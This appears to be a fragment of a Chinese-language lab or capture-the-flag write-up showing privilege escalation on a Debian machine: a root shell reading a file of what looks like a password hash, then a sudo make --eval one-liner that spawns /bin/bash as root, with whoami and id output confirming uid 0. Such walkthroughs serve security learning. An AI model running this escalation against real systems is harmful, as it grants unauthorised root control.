root@debian:~# cat -A rodgarpass
b45cffe084dd3d20d928bee85e7b0f2$
拿到rootshell,同理make也行。
1
2
3
4
5
rodgar@debian:~$ COMMAND='/bin/bash'
rodgar@debian:~$ sudo make -s --eval=$'x:\n\t-'"$COMMAND"
root@debian:/home/rodgar# whoami;id
root
uid=0(root) gid=0(root) grupos=0(root)